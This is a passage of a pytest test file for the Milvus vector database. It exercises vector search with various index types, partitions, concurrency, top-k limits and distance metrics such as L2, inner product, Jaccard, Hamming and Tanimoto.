target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
        """
        target: test search multi collections of L2
        method: add vectors into 10 collections, and search
        expected: search status ok, the length of result
        """
        self._connect()
        # Create and search 10 independent collections in sequence; each
        # iteration builds a fresh collection with its own data.
        collection_num = 10
        for i in range(collection_num):
            # 1. initialize with data
            log.info("test_search_multi_collections: search round %d" % (i + 1))
            collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
                                                                          auto_id=auto_id,
                                                                          dim=dim)[0:4]
            # 2. search
            vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
            log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
                     (default_limit, nq, collection_w.name))
            collection_w.search(vectors[:nq], default_search_field,
                                default_search_params, default_limit,
                                default_search_exp, _async=_async,
                                check_task=CheckTasks.check_search_results,
                                check_items={"nq": nq,
                                             "ids": insert_ids,
                                             "limit": default_limit,
                                             "_async": _async})
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
        """
        target: test concurrent search with multi-processes
        method: search with 10 processes, each process uses dependent connection
        expected: status ok and the returned vectors should be query_records
        """
        # 1. initialize with data
        # NOTE(review): despite the docstring, this uses threads, not processes.
        threads_num = 10
        threads = []
        collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
                                                                                  auto_id=auto_id,
                                                                                  dim=dim)[0:5]
        # Worker run by each thread; result checking happens inside search()
        # via check_task, so the threads need not return anything.
        def search(collection_w):
            vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
            collection_w.search(vectors[:nq], default_search_field,
                                default_search_params, default_limit,
                                default_search_exp, _async=_async,
                                travel_timestamp=time_stamp,
                                check_task=CheckTasks.check_search_results,
                                check_items={"nq": nq,
                                             "ids": insert_ids,
                                             "limit": default_limit,
                                             "_async": _async})
        # 2. search with multi-processes
        log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
        for i in range(threads_num):
            t = threading.Thread(target=search, args=(collection_w,))
            threads.append(t)
            t.start()
            # Stagger thread start-up slightly to avoid a thundering herd.
            time.sleep(0.2)
        for t in threads:
            t.join()
"""
******************************************************************
# The following cases are copied from test_search.py
******************************************************************
"""
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
    """
    Generate entities and add it in collection

    Reuses the module-level `entities` fixture when nb is the default 3000 to
    avoid regenerating rows on every call; other sizes are generated fresh.
    Returns (inserted_entities, primary_key_ids).
    """
    # NOTE(review): the `auto_id` parameter is accepted but never used here —
    # confirm whether callers rely on it before removing.
    global entities
    if nb == 3000:
        insert_entities = entities
    else:
        insert_entities = gen_entities(nb, is_normal=True)
    # NOTE(review): despite the plural name, `partition_names` is forwarded as
    # a single `partition_name` — callers pass one tag string, not a list.
    if partition_names is None:
        res = connect.insert(collection, insert_entities)
    else:
        res = connect.insert(collection, insert_entities, partition_name=partition_names)
    # Flush so the inserted entities are sealed and visible to searches.
    connect.flush([collection])
    ids = res.primary_keys
    return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
    """
    Generate entities and add it in collection

    Binary-vector variant of init_data(). Reuses the module-level
    `binary_entities`/`raw_vectors` fixtures when nb is the default 3000.
    Returns (raw_vectors, entities, primary_key_ids); `ids` stays empty when
    insert is False.
    """
    ids = []
    global binary_entities
    global raw_vectors
    if nb == 3000:
        insert_entities = binary_entities
        insert_raw_vectors = raw_vectors
    else:
        insert_raw_vectors, insert_entities = gen_binary_entities(nb)
    if insert is True:
        # NOTE(review): as in init_data, `partition_names` is a single tag
        # string forwarded to `partition_name`, not a list.
        if partition_names is None:
            res = connect.insert(collection, insert_entities)
        else:
            res = connect.insert(collection, insert_entities, partition_name=partition_names)
        # Flush so the inserted entities are sealed and visible to searches.
        connect.flush([collection])
        ids = res.primary_keys
    return insert_raw_vectors, insert_entities, ids
def check_id_result(result, id):
    """Return True if *id* is among the top hits of a search *result*.

    When the result holds at least five entities only the first five are
    considered; shorter results are scanned in full.
    """
    top_n = 5
    candidates = [entity.id for entity in result]
    if len(candidates) >= top_n:
        return id in candidates[:top_n]
    return id in candidates
class TestSearchBase:
"""
generate valid create_index params
"""
    @pytest.fixture(
        scope="function",
        params=gen_index()
    )
    def get_index(self, request, connect):
        # Parametrised over every index config produced by gen_index().
        # The commented-out lines once skipped index types unsupported in
        # CPU mode; kept for reference.
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param
    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        # Deep-copied so tests can mutate the dict (e.g. set metric_type)
        # without leaking changes into other parametrised runs.
        return copy.deepcopy(request.param)
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_jaccard_index(self, request, connect):
        logging.getLogger().info(request.param)
        # NOTE(review): implicitly yields None for index types outside
        # binary_support() instead of skipping — confirm downstream tests
        # tolerate a None index param.
        if request.param["index_type"] in binary_support():
            return request.param
        # else:
        #     pytest.skip("Skip index Temporary")
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_hamming_index(self, request, connect):
        logging.getLogger().info(request.param)
        # NOTE(review): implicitly yields None for index types outside
        # binary_support() instead of skipping — same caveat as
        # get_jaccard_index.
        if request.param["index_type"] in binary_support():
            return request.param
        # else:
        #     pytest.skip("Skip index Temporary")
    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_structure_index(self, request, connect):
        logging.getLogger().info(request.param)
        # Only the FLAT config out of gen_binary_index() is passed through;
        # every other param implicitly yields None rather than skipping.
        if request.param["index_type"] == "FLAT":
            return request.param
        # else:
        #     pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
    @pytest.fixture(
        scope="function",
        params=[1, 10]
    )
    def get_top_k(self, request):
        # Small representative top-k values for parametrised search tests.
        yield request.param
    @pytest.fixture(
        scope="function",
        params=[1, 10, 1100]
    )
    def get_nq(self, request):
        # Query-batch sizes, including one large value (1100) to stress nq.
        yield request.param
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_flat_top_k(self, connect, collection, get_nq):
        """
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        """
        top_k = 16385  # max top k is 16384
        nq = get_nq
        entities, ids = init_data(connect, collection)
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
        # NOTE(review): with top_k hard-coded above max_top_k, only the
        # exception branch ever executes; the success branch is dead code.
        if top_k <= max_top_k:
            connect.load_collection(collection)
            res = connect.search(collection, **query)
            assert len(res[0]) == top_k
            assert res[0]._distances[0] <= epsilon
            assert check_id_result(res[0], ids[0])
        else:
            # Searching with an over-limit top_k must be rejected server-side.
            with pytest.raises(Exception) as e:
                res = connect.search(collection, **query)
    @pytest.mark.skip("r0.3-test")
    def _test_search_field(self, connect, collection, get_top_k, get_nq):
        """
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        """
        # Skipped legacy test (leading underscore + skip marker): exercises
        # the old `fields=` selection on search results.
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection)
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
        if top_k <= max_top_k:
            connect.load_collection(collection)
            res = connect.search(collection, **query, fields=["float_vector"])
            assert len(res[0]) == top_k
            assert res[0]._distances[0] <= epsilon
            assert check_id_result(res[0], ids[0])
            # Requesting the scalar "float" field: each query's own float
            # value should appear among its returned entities.
            res = connect.search(collection, **query, fields=["float"])
            for i in range(nq):
                assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
        else:
            with pytest.raises(Exception):
                connect.search(collection, **query)
    def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
        """
        target: test basic search function before and after deletion, all the search params is
        correct, change top-k value.
        check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
        method: search with the given vectors, check the result
        expected: the deleted entities do not exist in the result.
        """
        # Disabled legacy test (leading underscore): relies on the removed
        # delete_entity_by_id API.
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection, nb=10000)
        first_int64_value = entities[0]["values"][0]
        first_vector = entities[2]["values"][0]
        search_param = get_search_param("FLAT")
        query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
        # Replace the generated query vectors with the first inserted vector
        # so the top hit is guaranteed to be entity ids[0].
        vecs[:] = []
        vecs.append(first_vector)
        res = None
        if top_k > max_top_k:
            with pytest.raises(Exception):
                connect.search(collection, **query, fields=['int64'])
            # pytest.skip("top_k value is larger than max_topp_k")
            pass
        else:
            res = connect.search(collection, **query, fields=['int64'])
            assert len(res) == 1
            assert len(res[0]) >= top_k
            assert res[0][0].id == ids[0]
            assert res[0][0].entity.get("int64") == first_int64_value
            assert res[0]._distances[0] < epsilon
            assert check_id_result(res[0], ids[0])
            # Delete the top-hit entity, then verify it vanishes from results
            # and the former runner-up becomes the new top hit.
            connect.delete_entity_by_id(collection, ids[:1])
            connect.flush([collection])
            res2 = connect.search(collection, **query, fields=['int64'])
            assert len(res2) == 1
            assert len(res2[0]) >= top_k
            assert res2[0][0].id != ids[0]
            if top_k > 1:
                assert res2[0][0].id == res[0][1].id
                assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
        """
        target: test basic search function, all the search params is correct, test all index params, and build
        method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k, search collection with partition tag return empty
        """
        top_k = get_top_k
        nq = get_nq
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        # Data goes into the default partition; default_tag stays empty.
        connect.create_partition(collection, default_tag)
        entities, ids = init_data(connect, collection)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, **query)
        else:
            # Whole-collection search hits the inserted data.
            connect.load_collection(collection)
            res = connect.search(collection, **query)
            assert len(res) == nq
            assert len(res[0]) >= top_k
            assert res[0]._distances[0] < epsilon
            assert check_id_result(res[0], ids[0])
            # Restricting the search to the empty partition must return
            # nothing; reload only that partition to scope the search.
            connect.release_collection(collection)
            connect.load_partitions(collection, [default_tag])
            res = connect.search(collection, **query, partition_names=[default_tag])
            assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
        """
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search collection with the given vectors and tags, check the result
        expected: the length of the result is top_k
        """
        top_k = get_top_k
        nq = 2
        new_tag = "new_tag"
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        # Two partitions with disjoint data: the query vectors come from the
        # entities stored in default_tag, so exact matches live there only.
        connect.create_partition(collection, default_tag)
        connect.create_partition(collection, new_tag)
        entities, ids = init_data(connect, collection, partition_names=default_tag)
        new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, **query)
        else:
            connect.load_collection(collection)
            # Whole-collection search: exact matches (distance ~0) from
            # default_tag dominate; new_tag's first entity must not rank.
            res = connect.search(collection, **query)
            assert check_id_result(res[0], ids[0])
            assert not check_id_result(res[1], new_ids[0])
            assert res[0]._distances[0] < epsilon
            assert res[1]._distances[0] < epsilon
            # Restricted to new_tag there is no exact match, so the nearest
            # distance must be non-trivial (> epsilon).
            res = connect.search(collection, **query, partition_names=[new_tag])
            assert res[0]._distances[0] > epsilon
            assert res[1]._distances[0] > epsilon
            connect.release_collection(collection)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
        """
        target: test basic search function, all the search params is correct, change top-k value
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        """
        top_k = get_top_k
        nq = get_nq
        entities, ids = init_data(connect, collection)
        # Inner-product metric: a vector matched against itself scores ~1
        # (assuming normalised vectors — TODO confirm generator normalises).
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP")
        connect.load_collection(collection)
        res = connect.search(collection, **query)
        assert len(res[0]) == top_k
        assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
        assert check_id_result(res[0], ids[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
        """
        target: test basic search function, all the search params is correct, test all index params, and build
        method: search with the given vectors, check the result
        expected: the length of the result is top_k
        """
        top_k = get_top_k
        nq = get_nq
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        entities, ids = init_data(connect, collection)
        # Rebuild the parametrised index with the IP metric before searching
        # (get_simple_index is a deep copy, so this mutation is test-local).
        get_simple_index["metric_type"] = "IP"
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
                                             search_params=search_param)
        connect.load_collection(collection)
        res = connect.search(collection, **query)
        assert len(res) == nq
        assert len(res[0]) >= top_k
        assert check_id_result(res[0], ids[0])
        # Self-match under IP should score ~1 within the allowed inaccuracy.
        assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
        """
        target: test basic search function, all the search params is correct, test all index params, and build
        method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k, search collection with partition tag return empty
        """
        top_k = get_top_k
        nq = get_nq
        metric_type = "IP"
        index_type = get_simple_index["index_type"]
        if index_type in skip_pq():
            pytest.skip("Skip PQ")
        # Data goes into the default partition; default_tag stays empty.
        connect.create_partition(collection, default_tag)
        entities, ids = init_data(connect, collection)
        get_simple_index["metric_type"] = metric_type
        connect.create_index(collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type=metric_type,
                                             search_params=search_param)
        if top_k > max_top_k:
            with pytest.raises(Exception) as e:
                res = connect.search(collection, **query)
        else:
            connect.load_collection(collection)
            res = connect.search(collection, **query)
            assert len(res) == nq
            assert len(res[0]) >= top_k
            # Self-match under IP should score ~1 within allowed inaccuracy.
            assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
            assert check_id_result(res[0], ids[0])
            # The empty partition must yield no hits.
            res = connect.search(collection, **query, partition_names=[default_tag])
            assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, **query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_without_connect(self, dis_connect, collection):
        """
        target: test search vectors without connection
        method: use dis connected instance, call search method and check if search successfully
        expected: raise exception
        """
        # dis_connect is a fixture providing a disconnected client handle.
        with pytest.raises(Exception) as e:
            res = dis_connect.search(collection, **default_query)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_collection_not_existed(self, connect):
        """
        target: search collection not existed
        method: search with the random collection_name, which is not in db
        expected: status not ok
        """
        # A freshly generated unique name is guaranteed absent from the db.
        collection_name = gen_unique_str(uid)
        with pytest.raises(Exception) as e:
            res = connect.search(collection_name, **default_query)
    @pytest.mark.tags(CaseLabel.L0)
    def test_search_distance_l2(self, connect, collection):
        """
        target: search collection, and check the result: distance
        method: compare the return distance value with value computed with Euclidean
        expected: the return distance equals to the computed value
        """
        nq = 2
        search_param = {"nprobe": 1}
        # Only two entities are inserted, so the nearest neighbour of the
        # random query must be one of these two rows.
        entities, ids = init_data(connect, collection, nb=nq)
        query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
                                                search_params=search_param)
        inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
                                                              search_params=search_param)
        # Ground-truth Euclidean distances from the random query to both rows.
        distance_0 = l2(vecs[0], inside_vecs[0])
        distance_1 = l2(vecs[0], inside_vecs[1])
        connect.load_collection(collection)
        res = connect.search(collection, **query)
        # Server reports squared L2, hence the sqrt before comparing.
        assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
        """
        target: search collection, and check the result: distance
        method: compare the return distance value with value computed with Euclidean (L2)
        expected: the return distance equals to the computed value
        """
        index_type = get_simple_index["index_type"]
        nq = 2
        entities, ids = init_data(connect, id_collection, auto_id=False)
        connect.create_index(id_collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
                                                search_params=search_param)
        inside_vecs = entities[-1]["values"]
        # Brute-force scan of every inserted vector to find the true
        # nearest neighbour (smallest L2 distance) and its id.
        min_distance = 1.0
        min_id = None
        for i in range(default_nb):
            tmp_dis = l2(vecs[0], inside_vecs[i])
            if min_distance > tmp_dis:
                min_distance = tmp_dis
                min_id = ids[i]
        connect.load_collection(id_collection)
        res = connect.search(id_collection, **query)
        tmp_epsilon = epsilon
        # The top hit must be the brute-force nearest neighbour.
        check_id_result(res[0], min_id)
        # if index_type in ["ANNOY", "IVF_PQ"]:
        #     tmp_epsilon = 0.1
        # TODO:
        # assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
    @pytest.mark.tags(CaseLabel.L0)
    def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with Jaccard
        expected: the return distance equals to the computed value
        """
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        # Query entities are generated but NOT inserted (insert=False).
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
        distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        # Smaller Jaccard distance == closer match.
        assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, **query)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_hamming_flat_index(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with Hamming
        expected: the return distance equals to the computed value
        """
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = hamming(query_int_vectors[0], int_vectors[0])
        distance_1 = hamming(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        # hamming() appears to return a numpy scalar, hence astype(float)
        # before the comparison.
        assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_substructure_flat_index(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: search with new random binary entities and SUBSTRUCTURE metric type
        expected: no hits are returned for unrelated random queries
        """
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        # Computed locally but intentionally unused: random vectors are not
        # expected to be substructures of the inserted ones.
        distance_0 = substructure(query_int_vectors[0], int_vectors[0])
        distance_1 = substructure(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
                                                metric_type="SUBSTRUCTURE")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        # SUBSTRUCTURE only returns true matches, so the result set is empty.
        assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: search with entities that related to inserted entities
        expected: each derived sub-vector matches its source entity exactly
        """
        top_k = 3
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        # Query vectors derived as substructures of the inserted vectors.
        query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
        # NOTE(review): `nq` is not defined in this method -- presumably a
        # module-level constant; confirm.
        query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
                                                replace_vecs=query_vecs)
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        assert res[0][0].distance <= epsilon
        assert res[0][0].id == ids[0]
        assert res[1][0].distance <= epsilon
        assert res[1][0].id == ids[1]
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: search with new random binary entities and SUPERSTRUCTURE metric type
        expected: no hits are returned for unrelated random queries
        """
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        # Computed locally but intentionally unused: random vectors are not
        # expected to be superstructures of the inserted ones.
        distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
        distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
                                                metric_type="SUPERSTRUCTURE")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        # SUPERSTRUCTURE only returns true matches, so the result set is empty.
        assert len(res[0]) == 0
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with SUPERSTRUCTURE
        expected: both derived super-vectors match the inserted entities
        """
        top_k = 3
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        # Query vectors derived as superstructures of the inserted vectors.
        query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
        # NOTE(review): `nq` is not defined in this method -- presumably a
        # module-level constant; confirm.
        query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
                                                replace_vecs=query_vecs)
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        assert len(res[0]) == 2
        assert len(res[1]) == 2
        assert res[0][0].id in ids
        assert res[0][0].distance <= epsilon
        assert res[1][0].id in ids
        assert res[1][0].distance <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
        """
        target: search binary_collection, and check the result: distance
        method: compare the return distance value with value computed with Tanimoto
        expected: the return distance equals to the computed value
        """
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
        distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        # Smaller Tanimoto distance == closer match.
        assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(300)
    def test_search_concurrent_multithreads_single_connection(self, connect, args):
        """
        target: test concurrent search from multiple threads
        method: search from 4 threads that all share a single milvus client
        expected: status ok and the returned vectors should be query_records
        """
        nb = 100
        top_k = 10
        threads_num = 4
        threads = []
        collection = gen_unique_str(uid)
        # NOTE(review): nb, top_k and uri are assigned but never used here.
        uri = "tcp://%s:%s" % (args["ip"], args["port"])
        # create collection
        milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
        milvus.create_collection(collection, default_fields)
        entities, ids = init_data(milvus, collection)
        connect.load_collection(collection)

        def search(milvus):
            # Runs in each worker thread, sharing the `milvus` client.
            res = milvus.search(collection, **default_query)
            assert len(res) == 1
            assert res[0]._entities[0].id in ids
            assert res[0]._distances[0] < epsilon

        for i in range(threads_num):
            t = MyThread(target=search, args=(milvus,))
            threads.append(t)
            t.start()
            # Stagger thread start-up slightly.
            time.sleep(0.2)
        for t in threads:
            t.join()
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_multi_collections(self, connect, args):
        """
        target: test search multi collections of L2
        method: add vectors into 10 collections, and search
        expected: search status ok, the length of result
        """
        num = 10
        top_k = 10
